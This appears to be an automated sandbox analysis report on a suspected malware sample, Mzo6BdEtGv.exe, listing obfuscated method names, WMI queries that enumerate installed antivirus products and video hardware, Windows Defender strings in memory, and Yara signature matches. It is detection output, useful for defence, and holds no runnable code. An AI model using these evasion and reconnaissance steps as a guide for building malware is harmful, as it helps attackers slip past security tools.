Source: Mzo6BdEtGv.exe, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs |
High entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC' |
Source: Mzo6BdEtGv.exe, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.cs |
High entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph' |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: C:\ FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
File Volume queried: unknown FullSizeInformation |
Jump to behavior |
Source: Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B2CE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: Mzo6BdEtGv.exe, 00000001.00000002.3746700198.000000001C235000.00000004.00000020.00020000.00000000.sdmp, Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B368000.00000004.00000020.00020000.00000000.sdmp, Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B2CE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe |
Source: Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B270000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Defender\MsMpeng.exe |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe |
WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct |
Source: Yara match |
File source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR |
Source: Yara match |
File source: sslproxydump.pcap, type: PCAP |
Source: Yara match |
File source: Mzo6BdEtGv.exe, type: SAMPLE |
Source: Yara match |
File source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR |
Source: Yara match |
File source: sslproxydump.pcap, type: PCAP |
Source: Yara match |
File source: Mzo6BdEtGv.exe, type: SAMPLE |
Source: Yara match |
File source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR |